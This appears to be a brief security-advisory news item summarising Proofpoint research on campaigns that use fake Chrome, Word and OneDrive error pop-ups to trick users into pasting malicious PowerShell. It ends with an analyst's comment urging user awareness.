Proofpoint posted research on an increase in a technique leveraging unique social engineering that directs users to copy and paste malicious PowerShell scripts to infect their computers with malware. Essentially, through the use of fake Google Chrome, Word, and OneDrive errors, users may be tricked into literally copying and pasting malicious PowerShell scripts into their Windows terminals.

According to Proofpoint, although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk.

Additional notables:

• The campaign uses fake Google Chrome, Word, and OneDrive errors to trick users into running malicious PowerShell "fixes" that install malware.
• These errors prompt the visitor to click a button to copy a PowerShell "fix" into the clipboard and then paste and run it in a Run: dialog or PowerShell prompt.
• The payloads observed include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer.
• Threat actors also utilize JavaScript in HTML attachments and compromised websites in the new attacks. However, now the overlays display fake Google Chrome, Microsoft Word, and OneDrive errors.
• The new campaign was observed being used by multiple threat actors, including those behind ClearFake, a new attack cluster called ClickFix, and the TA571 threat actor, known for operating as a spam distributor that sends large volumes of email, leading to malware and ransomware infections.

For more, security analysts and sysadmins are encouraged to visit Proofpoint for more analysis.

Analyst comment (Jennifer Lyn Walker): While this tactic does involve significant user interaction, as Proofpoint assess, “the social engineering is clever enough…which may prompt a user to take action without considering the risk.” That said, there are some good screenshots in the Proofpoint blog post that could be used to show users what to look for and emphasize the need for vigilance and reporting this and similar “technical sounding” tactics.

Additional Resources

• Fake Google Chrome errors trick you into running malicious PowerShell scripts | BleepingComputer
• Secure your clipboard: Hackers lure users to copy and paste malware | SCMagazine
• Malware peddlers love this one social engineering trick! | HelpNetSecurity